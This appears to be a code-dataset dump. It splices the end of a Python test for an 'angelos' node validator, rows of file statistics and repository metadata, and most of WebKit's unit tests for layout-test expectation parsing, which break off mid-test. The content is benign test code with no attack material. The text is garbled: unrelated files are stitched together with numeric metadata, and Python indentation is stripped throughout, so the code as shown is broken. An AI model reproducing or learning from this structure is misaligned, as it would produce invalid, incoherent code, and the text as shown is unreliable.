from angelos.portfolio.node.validate import ValidateNode
from test.fixture.generate import Generate
class TestValidateNode(TestCase):
def test_perform(self):
data = PersonData(**Generate.person_data()[0])
portfolio = CreatePersonEntity().perform(data)
CreateDomain().perform(portfolio)
node = CreateNode().current(portfolio, server=True)
self.assertIn(node, portfolio.nodes)
with evaluate("Node:Validate") as report:
ValidateNode().validate(portfolio, node)
self.assertIn(node, portfolio.nodes)
self.assertTrue(report) | 35.717949 | 89 | 0.747308 | 166 | 1,393 | 6.259036 | 0.518072 | 0.063523 | 0.076997 | 0.046198 | 0.057748 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007732 | 0.164393 | 1,393 | 39 | 90 | 35.717949 | 0.88488 | 0.325915 | 0 | 0.105263 | 0 | 0 | 0.014115 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 1 | 0.052632 | false | 0 | 0.421053 | 0 | 0.526316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
f438fbc1cb4ef26d0085e9810a08b99f07685dbc | 48,279 | py | Python | third_party/WebKit/Tools/Scripts/webkitpy/layout_tests/models/test_expectations_unittest.py | wenfeifei/miniblink49 | 2ed562ff70130485148d94b0e5f4c343da0c2ba4 | [
"Apache-2.0"
] | 5,964 | 2016-09-27T03:46:29.000Z | 2022-03-31T16:25:27.000Z | third_party/WebKit/Tools/Scripts/webkitpy/layout_tests/models/test_expectations_unittest.py | w4454962/miniblink49 | b294b6eacb3333659bf7b94d670d96edeeba14c0 | [
"Apache-2.0"
] | 459 | 2016-09-29T00:51:38.000Z | 2022-03-07T14:37:46.000Z | third_party/WebKit/Tools/Scripts/webkitpy/layout_tests/models/test_expectations_unittest.py | w4454962/miniblink49 | b294b6eacb3333659bf7b94d670d96edeeba14c0 | [
"Apache-2.0"
] | 1,006 | 2016-09-27T05:17:27.000Z | 2022-03-30T02:46:51.000Z | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
from webkitpy.common.host_mock import MockHost
from webkitpy.common.system.outputcapture import OutputCapture
from webkitpy.layout_tests.models.test_configuration import *
from webkitpy.layout_tests.models.test_expectations import *
try:
from collections import OrderedDict
except ImportError:
# Needed for Python < 2.7
from webkitpy.thirdparty.ordered_dict import OrderedDict
class Base(unittest.TestCase):
# Note that all of these tests are written assuming the configuration
# being tested is Windows XP, Release build.
def __init__(self, testFunc):
host = MockHost()
self._port = host.port_factory.get('test-win-xp', None)
self._exp = None
unittest.TestCase.__init__(self, testFunc)
def get_basic_tests(self):
return ['failures/expected/text.html',
'failures/expected/image_checksum.html',
'failures/expected/crash.html',
'failures/expected/needsrebaseline.html',
'failures/expected/needsmanualrebaseline.html',
'failures/expected/missing_text.html',
'failures/expected/image.html',
'failures/expected/timeout.html',
'passes/text.html']
def get_basic_expectations(self):
return """
Bug(test) failures/expected/text.html [ Failure ]
Bug(test) failures/expected/crash.html [ WontFix ]
Bug(test) failures/expected/needsrebaseline.html [ NeedsRebaseline ]
Bug(test) failures/expected/needsmanualrebaseline.html [ NeedsManualRebaseline ]
Bug(test) failures/expected/missing_image.html [ Rebaseline Missing ]
Bug(test) failures/expected/image_checksum.html [ WontFix ]
Bug(test) failures/expected/image.html [ WontFix Mac ]
"""
def parse_exp(self, expectations, overrides=None, is_lint_mode=False):
expectations_dict = OrderedDict()
expectations_dict['expectations'] = expectations
if overrides:
expectations_dict['overrides'] = overrides
self._port.expectations_dict = lambda: expectations_dict
expectations_to_lint = expectations_dict if is_lint_mode else None
self._exp = TestExpectations(self._port, self.get_basic_tests(), expectations_dict=expectations_to_lint, is_lint_mode=is_lint_mode)
def assert_exp_list(self, test, results):
self.assertEqual(self._exp.get_expectations(test), set(results))
def assert_exp(self, test, result):
self.assert_exp_list(test, [result])
def assert_bad_expectations(self, expectations, overrides=None):
self.assertRaises(ParseError, self.parse_exp, expectations, is_lint_mode=True, overrides=overrides)
class BasicTests(Base):
def test_basic(self):
self.parse_exp(self.get_basic_expectations())
self.assert_exp('failures/expected/text.html', FAIL)
self.assert_exp_list('failures/expected/image_checksum.html', [WONTFIX, SKIP])
self.assert_exp('passes/text.html', PASS)
self.assert_exp('failures/expected/image.html', PASS)
class MiscTests(Base):
def test_multiple_results(self):
self.parse_exp('Bug(x) failures/expected/text.html [ Crash Failure ]')
self.assertEqual(self._exp.get_expectations('failures/expected/text.html'), set([FAIL, CRASH]))
def test_result_was_expected(self):
# test basics
self.assertEqual(TestExpectations.result_was_expected(PASS, set([PASS]), test_needs_rebaselining=False), True)
self.assertEqual(TestExpectations.result_was_expected(FAIL, set([PASS]), test_needs_rebaselining=False), False)
# test handling of SKIPped tests and results
self.assertEqual(TestExpectations.result_was_expected(SKIP, set([CRASH]), test_needs_rebaselining=False), True)
self.assertEqual(TestExpectations.result_was_expected(SKIP, set([LEAK]), test_needs_rebaselining=False), True)
# test handling of MISSING results and the REBASELINE specifier
self.assertEqual(TestExpectations.result_was_expected(MISSING, set([PASS]), test_needs_rebaselining=True), True)
self.assertEqual(TestExpectations.result_was_expected(MISSING, set([PASS]), test_needs_rebaselining=False), False)
self.assertTrue(TestExpectations.result_was_expected(PASS, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertTrue(TestExpectations.result_was_expected(MISSING, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertTrue(TestExpectations.result_was_expected(TEXT, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertTrue(TestExpectations.result_was_expected(IMAGE, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertTrue(TestExpectations.result_was_expected(IMAGE_PLUS_TEXT, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertTrue(TestExpectations.result_was_expected(AUDIO, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertFalse(TestExpectations.result_was_expected(TIMEOUT, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertFalse(TestExpectations.result_was_expected(CRASH, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
self.assertFalse(TestExpectations.result_was_expected(LEAK, set([NEEDS_REBASELINE]), test_needs_rebaselining=False))
def test_remove_pixel_failures(self):
self.assertEqual(TestExpectations.remove_pixel_failures(set([FAIL])), set([FAIL]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([PASS])), set([PASS]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([IMAGE])), set([PASS]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([FAIL])), set([FAIL]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([PASS, IMAGE, CRASH])), set([PASS, CRASH]))
def test_suffixes_for_expectations(self):
self.assertEqual(TestExpectations.suffixes_for_expectations(set([FAIL])), set(['txt', 'png', 'wav']))
self.assertEqual(TestExpectations.suffixes_for_expectations(set([IMAGE])), set(['png']))
self.assertEqual(TestExpectations.suffixes_for_expectations(set([FAIL, IMAGE, CRASH])), set(['txt', 'png', 'wav']))
self.assertEqual(TestExpectations.suffixes_for_expectations(set()), set())
def test_category_expectations(self):
# This test checks unknown tests are not present in the
# expectations and that known test part of a test category is
# present in the expectations.
exp_str = 'Bug(x) failures/expected [ WontFix ]'
self.parse_exp(exp_str)
test_name = 'failures/expected/unknown-test.html'
unknown_test = test_name
self.assertRaises(KeyError, self._exp.get_expectations,
unknown_test)
self.assert_exp_list('failures/expected/crash.html', [WONTFIX, SKIP])
def test_get_expectations_string(self):
self.parse_exp(self.get_basic_expectations())
self.assertEqual(self._exp.get_expectations_string('failures/expected/text.html'), 'FAIL')
def test_expectation_to_string(self):
# Normal cases are handled by other tests.
self.parse_exp(self.get_basic_expectations())
self.assertRaises(ValueError, self._exp.expectation_to_string,
-1)
def test_get_test_set(self):
# Handle some corner cases for this routine not covered by other tests.
self.parse_exp(self.get_basic_expectations())
s = self._exp.get_test_set(WONTFIX)
self.assertEqual(s, set(['failures/expected/crash.html', 'failures/expected/image_checksum.html']))
def test_needs_rebaseline_reftest(self):
try:
filesystem = self._port.host.filesystem
filesystem.write_text_file(filesystem.join(self._port.layout_tests_dir(), 'failures/expected/needsrebaseline.html'), 'content')
filesystem.write_text_file(filesystem.join(self._port.layout_tests_dir(), 'failures/expected/needsrebaseline-expected.html'), 'content')
filesystem.write_text_file(filesystem.join(self._port.layout_tests_dir(), 'failures/expected/needsmanualrebaseline.html'), 'content')
filesystem.write_text_file(filesystem.join(self._port.layout_tests_dir(), 'failures/expected/needsmanualrebaseline-expected.html'), 'content')
self.parse_exp("""Bug(user) failures/expected/needsrebaseline.html [ NeedsRebaseline ]
Bug(user) failures/expected/needsmanualrebaseline.html [ NeedsManualRebaseline ]""", is_lint_mode=True)
self.assertFalse(True, "ParseError wasn't raised")
except ParseError, e:
warnings = """expectations:1 A reftest cannot be marked as NeedsRebaseline/NeedsManualRebaseline failures/expected/needsrebaseline.html
expectations:2 A reftest cannot be marked as NeedsRebaseline/NeedsManualRebaseline failures/expected/needsmanualrebaseline.html"""
self.assertEqual(str(e), warnings)
def test_parse_warning(self):
try:
filesystem = self._port.host.filesystem
filesystem.write_text_file(filesystem.join(self._port.layout_tests_dir(), 'disabled-test.html-disabled'), 'content')
filesystem.write_text_file(filesystem.join(self._port.layout_tests_dir(), 'test-to-rebaseline.html'), 'content')
'disabled-test.html-disabled',
self.parse_exp("Bug(user) [ FOO ] failures/expected/text.html [ Failure ]\n"
"Bug(user) non-existent-test.html [ Failure ]\n"
"Bug(user) disabled-test.html-disabled [ ImageOnlyFailure ]\n"
"Bug(user) [ Release ] test-to-rebaseline.html [ NeedsRebaseline ]", is_lint_mode=True)
self.assertFalse(True, "ParseError wasn't raised")
except ParseError, e:
warnings = ("expectations:1 Unrecognized specifier 'foo' failures/expected/text.html\n"
"expectations:2 Path does not exist. non-existent-test.html\n"
"expectations:4 A test cannot be rebaselined for Debug/Release. test-to-rebaseline.html")
self.assertEqual(str(e), warnings)
def test_parse_warnings_are_logged_if_not_in_lint_mode(self):
oc = OutputCapture()
try:
oc.capture_output()
self.parse_exp('-- this should be a syntax error', is_lint_mode=False)
finally:
_, _, logs = oc.restore_output()
self.assertNotEquals(logs, '')
def test_error_on_different_platform(self):
# parse_exp uses a Windows port. Assert errors on Mac show up in lint mode.
self.assertRaises(ParseError, self.parse_exp,
'Bug(test) [ Mac ] failures/expected/text.html [ Failure ]\nBug(test) [ Mac ] failures/expected/text.html [ Failure ]',
is_lint_mode=True)
def test_error_on_different_build_type(self):
# parse_exp uses a Release port. Assert errors on DEBUG show up in lint mode.
self.assertRaises(ParseError, self.parse_exp,
'Bug(test) [ Debug ] failures/expected/text.html [ Failure ]\nBug(test) [ Debug ] failures/expected/text.html [ Failure ]',
is_lint_mode=True)
def test_overrides(self):
self.parse_exp("Bug(exp) failures/expected/text.html [ Failure ]",
"Bug(override) failures/expected/text.html [ ImageOnlyFailure ]")
self.assert_exp_list('failures/expected/text.html', [FAIL, IMAGE])
def test_overrides__directory(self):
self.parse_exp("Bug(exp) failures/expected/text.html [ Failure ]",
"Bug(override) failures/expected [ Crash ]")
self.assert_exp_list('failures/expected/text.html', [FAIL, CRASH])
self.assert_exp_list('failures/expected/image.html', [CRASH])
def test_overrides__duplicate(self):
self.assert_bad_expectations("Bug(exp) failures/expected/text.html [ Failure ]",
"Bug(override) failures/expected/text.html [ ImageOnlyFailure ]\n"
"Bug(override) failures/expected/text.html [ Crash ]\n")
def test_pixel_tests_flag(self):
def match(test, result, pixel_tests_enabled):
return self._exp.matches_an_expected_result(
test, result, pixel_tests_enabled, sanitizer_is_enabled=False)
self.parse_exp(self.get_basic_expectations())
self.assertTrue(match('failures/expected/text.html', FAIL, True))
self.assertTrue(match('failures/expected/text.html', FAIL, False))
self.assertFalse(match('failures/expected/text.html', CRASH, True))
self.assertFalse(match('failures/expected/text.html', CRASH, False))
self.assertTrue(match('failures/expected/image_checksum.html', PASS, True))
self.assertTrue(match('failures/expected/image_checksum.html', PASS, False))
self.assertTrue(match('failures/expected/crash.html', PASS, False))
self.assertTrue(match('failures/expected/needsrebaseline.html', TEXT, True))
self.assertFalse(match('failures/expected/needsrebaseline.html', CRASH, True))
self.assertTrue(match('failures/expected/needsmanualrebaseline.html', TEXT, True))
self.assertFalse(match('failures/expected/needsmanualrebaseline.html', CRASH, True))
self.assertTrue(match('passes/text.html', PASS, False))
def test_sanitizer_flag(self):
def match(test, result):
return self._exp.matches_an_expected_result(
test, result, pixel_tests_are_enabled=False, sanitizer_is_enabled=True)
self.parse_exp("""
Bug(test) failures/expected/crash.html [ Crash ]
Bug(test) failures/expected/image.html [ ImageOnlyFailure ]
Bug(test) failures/expected/text.html [ Failure ]
Bug(test) failures/expected/timeout.html [ Timeout ]
""")
self.assertTrue(match('failures/expected/crash.html', CRASH))
self.assertTrue(match('failures/expected/image.html', PASS))
self.assertTrue(match('failures/expected/text.html', PASS))
self.assertTrue(match('failures/expected/timeout.html', TIMEOUT))
def test_more_specific_override_resets_skip(self):
self.parse_exp("Bug(x) failures/expected [ Skip ]\n"
"Bug(x) failures/expected/text.html [ ImageOnlyFailure ]\n")
self.assert_exp('failures/expected/text.html', IMAGE)
self.assertFalse(self._port._filesystem.join(self._port.layout_tests_dir(),
'failures/expected/text.html') in
self._exp.get_tests_with_result_type(SKIP))
def test_bot_test_expectations(self):
"""Test that expectations are merged rather than overridden when using flaky option 'unexpected'."""
test_name1 = 'failures/expected/text.html'
test_name2 = 'passes/text.html'
expectations_dict = OrderedDict()
expectations_dict['expectations'] = "Bug(x) %s [ ImageOnlyFailure ]\nBug(x) %s [ Slow ]\n" % (test_name1, test_name2)
self._port.expectations_dict = lambda: expectations_dict
expectations = TestExpectations(self._port, self.get_basic_tests())
self.assertEqual(expectations.get_expectations(test_name1), set([IMAGE]))
self.assertEqual(expectations.get_expectations(test_name2), set([SLOW]))
def bot_expectations():
return {test_name1: ['PASS', 'TIMEOUT'], test_name2: ['CRASH']}
self._port.bot_expectations = bot_expectations
self._port._options.ignore_flaky_tests = 'unexpected'
expectations = TestExpectations(self._port, self.get_basic_tests())
self.assertEqual(expectations.get_expectations(test_name1), set([PASS, IMAGE, TIMEOUT]))
self.assertEqual(expectations.get_expectations(test_name2), set([CRASH, SLOW]))
class SkippedTests(Base):
def check(self, expectations, overrides, skips, lint=False, expected_results=[WONTFIX, SKIP, FAIL]):
port = MockHost().port_factory.get('test-win-xp')
port._filesystem.write_text_file(port._filesystem.join(port.layout_tests_dir(), 'failures/expected/text.html'), 'foo')
expectations_dict = OrderedDict()
expectations_dict['expectations'] = expectations
if overrides:
expectations_dict['overrides'] = overrides
port.expectations_dict = lambda: expectations_dict
port.skipped_layout_tests = lambda tests: set(skips)
expectations_to_lint = expectations_dict if lint else None
exp = TestExpectations(port, ['failures/expected/text.html'], expectations_dict=expectations_to_lint, is_lint_mode=lint)
self.assertEqual(exp.get_expectations('failures/expected/text.html'), set(expected_results))
def test_skipped_tests_work(self):
self.check(expectations='', overrides=None, skips=['failures/expected/text.html'], expected_results=[WONTFIX, SKIP])
def test_duplicate_skipped_test_fails_lint(self):
self.assertRaises(ParseError, self.check, expectations='Bug(x) failures/expected/text.html [ Failure ]\n',
overrides=None, skips=['failures/expected/text.html'], lint=True)
def test_skipped_file_overrides_expectations(self):
self.check(expectations='Bug(x) failures/expected/text.html [ Failure ]\n', overrides=None,
skips=['failures/expected/text.html'])
def test_skipped_dir_overrides_expectations(self):
self.check(expectations='Bug(x) failures/expected/text.html [ Failure ]\n', overrides=None,
skips=['failures/expected'])
def test_skipped_file_overrides_overrides(self):
self.check(expectations='', overrides='Bug(x) failures/expected/text.html [ Failure ]\n',
skips=['failures/expected/text.html'])
def test_skipped_dir_overrides_overrides(self):
self.check(expectations='', overrides='Bug(x) failures/expected/text.html [ Failure ]\n',
skips=['failures/expected'])
def test_skipped_entry_dont_exist(self):
port = MockHost().port_factory.get('test-win-xp')
expectations_dict = OrderedDict()
expectations_dict['expectations'] = ''
port.expectations_dict = lambda: expectations_dict
port.skipped_layout_tests = lambda tests: set(['foo/bar/baz.html'])
capture = OutputCapture()
capture.capture_output()
exp = TestExpectations(port)
_, _, logs = capture.restore_output()
self.assertEqual('The following test foo/bar/baz.html from the Skipped list doesn\'t exist\n', logs)
def test_expectations_string(self):
self.parse_exp(self.get_basic_expectations())
notrun = 'failures/expected/text.html'
self._exp.add_extra_skipped_tests([notrun])
self.assertEqual('NOTRUN', self._exp.get_expectations_string(notrun))
class ExpectationSyntaxTests(Base):
def test_unrecognized_expectation(self):
self.assert_bad_expectations('Bug(test) failures/expected/text.html [ Unknown ]')
def test_macro(self):
exp_str = 'Bug(test) [ Win ] failures/expected/text.html [ Failure ]'
self.parse_exp(exp_str)
self.assert_exp('failures/expected/text.html', FAIL)
def assert_tokenize_exp(self, line, bugs=None, specifiers=None, expectations=None, warnings=None, comment=None, name='foo.html'):
bugs = bugs or []
specifiers = specifiers or []
expectations = expectations or []
warnings = warnings or []
filename = 'TestExpectations'
line_number = '1'
expectation_line = TestExpectationParser._tokenize_line(filename, line, line_number)
self.assertEqual(expectation_line.warnings, warnings)
self.assertEqual(expectation_line.name, name)
self.assertEqual(expectation_line.filename, filename)
self.assertEqual(expectation_line.line_numbers, line_number)
if not warnings:
self.assertEqual(expectation_line.specifiers, specifiers)
self.assertEqual(expectation_line.expectations, expectations)
def test_comments(self):
self.assert_tokenize_exp("# comment", name=None, comment="# comment")
self.assert_tokenize_exp("foo.html [ Pass ] # comment", comment="# comment", expectations=['PASS'], specifiers=[])
def test_config_specifiers(self):
self.assert_tokenize_exp('[ Mac ] foo.html [ Failure ] ', specifiers=['MAC'], expectations=['FAIL'])
def test_unknown_config(self):
self.assert_tokenize_exp('[ Foo ] foo.html [ Pass ]', specifiers=['Foo'], expectations=['PASS'])
def test_unknown_expectation(self):
self.assert_tokenize_exp('foo.html [ Audio ]', warnings=['Unrecognized expectation "Audio"'])
def test_skip(self):
self.assert_tokenize_exp('foo.html [ Skip ]', specifiers=[], expectations=['SKIP'])
def test_slow(self):
self.assert_tokenize_exp('foo.html [ Slow ]', specifiers=[], expectations=['SLOW'])
def test_wontfix(self):
self.assert_tokenize_exp('foo.html [ WontFix ]', specifiers=[], expectations=['WONTFIX', 'SKIP'])
self.assert_tokenize_exp('foo.html [ WontFix ImageOnlyFailure ]', specifiers=[], expectations=['WONTFIX', 'SKIP'],
warnings=['A test marked Skip or WontFix must not have other expectations.'])
def test_blank_line(self):
self.assert_tokenize_exp('', name=None)
def test_warnings(self):
self.assert_tokenize_exp('[ Mac ]', warnings=['Did not find a test name.', 'Missing expectations.'], name=None)
self.assert_tokenize_exp('[ [', warnings=['unexpected "["', 'Missing expectations.'], name=None)
self.assert_tokenize_exp('crbug.com/12345 ]', warnings=['unexpected "]"', 'Missing expectations.'], name=None)
self.assert_tokenize_exp('foo.html crbug.com/12345 ]', warnings=['"crbug.com/12345" is not at the start of the line.', 'Missing expectations.'])
self.assert_tokenize_exp('foo.html', warnings=['Missing expectations.'])
class SemanticTests(Base):
def test_bug_format(self):
self.assertRaises(ParseError, self.parse_exp, 'BUG1234 failures/expected/text.html [ Failure ]', is_lint_mode=True)
def test_bad_bugid(self):
try:
self.parse_exp('crbug/1234 failures/expected/text.html [ Failure ]', is_lint_mode=True)
self.fail('should have raised an error about a bad bug identifier')
except ParseError, exp:
self.assertEqual(len(exp.warnings), 3)
def test_missing_bugid(self):
self.parse_exp('failures/expected/text.html [ Failure ]', is_lint_mode=False)
self.assertFalse(self._exp.has_warnings())
try:
self.parse_exp('failures/expected/text.html [ Failure ]', is_lint_mode=True)
except ParseError, exp:
self.assertEqual(exp.warnings, ['expectations:1 Test lacks BUG specifier. failures/expected/text.html'])
def test_skip_and_wontfix(self):
# Skip is not allowed to have other expectations as well, because those
# expectations won't be exercised and may become stale .
self.parse_exp('failures/expected/text.html [ Failure Skip ]')
self.assertTrue(self._exp.has_warnings())
self.parse_exp('failures/expected/text.html [ Crash WontFix ]')
self.assertTrue(self._exp.has_warnings())
self.parse_exp('failures/expected/text.html [ Pass WontFix ]')
self.assertTrue(self._exp.has_warnings())
def test_rebaseline(self):
# Can't lint a file w/ 'REBASELINE' in it.
self.assertRaises(ParseError, self.parse_exp,
'Bug(test) failures/expected/text.html [ Failure Rebaseline ]',
is_lint_mode=True)
def test_duplicates(self):
self.assertRaises(ParseError, self.parse_exp, """
Bug(exp) failures/expected/text.html [ Failure ]
Bug(exp) failures/expected/text.html [ ImageOnlyFailure ]""", is_lint_mode=True)
self.assertRaises(ParseError, self.parse_exp,
self.get_basic_expectations(), overrides="""
Bug(override) failures/expected/text.html [ Failure ]
Bug(override) failures/expected/text.html [ ImageOnlyFailure ]""", is_lint_mode=True)
def test_duplicate_with_line_before_preceding_line(self):
self.assert_bad_expectations("""Bug(exp) [ Debug ] failures/expected/text.html [ Failure ]
Bug(exp) [ Release ] failures/expected/text.html [ Failure ]
Bug(exp) [ Debug ] failures/expected/text.html [ Failure ]
""")
def test_missing_file(self):
self.parse_exp('Bug(test) missing_file.html [ Failure ]')
self.assertTrue(self._exp.has_warnings(), 1)
class PrecedenceTests(Base):
def test_file_over_directory(self):
# This tests handling precedence of specific lines over directories
# and tests expectations covering entire directories.
exp_str = """
Bug(x) failures/expected/text.html [ Failure ]
Bug(y) failures/expected [ WontFix ]
"""
self.parse_exp(exp_str)
self.assert_exp('failures/expected/text.html', FAIL)
self.assert_exp_list('failures/expected/crash.html', [WONTFIX, SKIP])
exp_str = """
Bug(x) failures/expected [ WontFix ]
Bug(y) failures/expected/text.html [ Failure ]
"""
self.parse_exp(exp_str)
self.assert_exp('failures/expected/text.html', FAIL)
self.assert_exp_list('failures/expected/crash.html', [WONTFIX, SKIP])
def test_ambiguous(self):
self.assert_bad_expectations("Bug(test) [ Release ] passes/text.html [ Pass ]\n"
"Bug(test) [ Win ] passes/text.html [ Failure ]\n")
def test_more_specifiers(self):
self.assert_bad_expectations("Bug(test) [ Release ] passes/text.html [ Pass ]\n"
"Bug(test) [ Win Release ] passes/text.html [ Failure ]\n")
def test_order_in_file(self):
self.assert_bad_expectations("Bug(test) [ Win Release ] : passes/text.html [ Failure ]\n"
"Bug(test) [ Release ] : passes/text.html [ Pass ]\n")
def test_macro_overrides(self):
self.assert_bad_expectations("Bug(test) [ Win ] passes/text.html [ Pass ]\n"
"Bug(test) [ XP ] passes/text.html [ Failure ]\n")
class RemoveConfigurationsTest(Base):
def test_remove(self):
host = MockHost()
test_port = host.port_factory.get('test-win-xp', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {"expectations": """Bug(x) [ Linux Win Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Mac Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port, self.get_basic_tests())
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
self.assertEqual("""Bug(x) [ Linux Win7 Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Mac Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_needs_rebaseline(self):
host = MockHost()
test_port = host.port_factory.get('test-win-xp', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {"expectations": """Bug(x) [ Win ] failures/expected/foo.html [ NeedsRebaseline ]
"""}
expectations = TestExpectations(test_port, self.get_basic_tests())
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
self.assertEqual("""Bug(x) [ XP Debug ] failures/expected/foo.html [ NeedsRebaseline ]
Bug(x) [ Win7 ] failures/expected/foo.html [ NeedsRebaseline ]
""", actual_expectations)
def test_remove_multiple_configurations(self):
host = MockHost()
test_port = host.port_factory.get('test-win-xp', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([
('failures/expected/foo.html', test_config),
('failures/expected/foo.html', host.port_factory.get('test-win-win7', None).test_configuration()),
])
self.assertEqual("""Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_line_with_comments(self):
host = MockHost()
test_port = host.port_factory.get('test-win-xp', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
# This comment line should get stripped. As should the preceding line.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', host.port_factory.get('test-win-win7', None).test_configuration())])
self.assertEqual("""Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_line_with_comments_at_start(self):
host = MockHost()
test_port = host.port_factory.get('test-win-xp', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """
# This comment line should get stripped. As should the preceding line.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', host.port_factory.get('test-win-win7', None).test_configuration())])
self.assertEqual("""
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_line_with_comments_at_end_with_no_trailing_newline(self):
host = MockHost()
test_port = host.port_factory.get('test-win-xp', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
# This comment line should get stripped. As should the preceding line.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', host.port_factory.get('test-win-win7', None).test_configuration())])
self.assertEqual("""Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]""", actual_expectations)
def test_remove_line_leaves_comments_for_next_line(self):
host = MockHost()
test_port = host.port_factory.get('test-win-xp', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """
# This comment line should not get stripped.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', host.port_factory.get('test-win-win7', None).test_configuration())])
self.assertEqual("""
# This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_line_no_whitespace_lines(self):
host = MockHost()
test_port = host.port_factory.get('test-win-xp', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """
# This comment line should get stripped.
Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
# This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', host.port_factory.get('test-win-win7', None).test_configuration())])
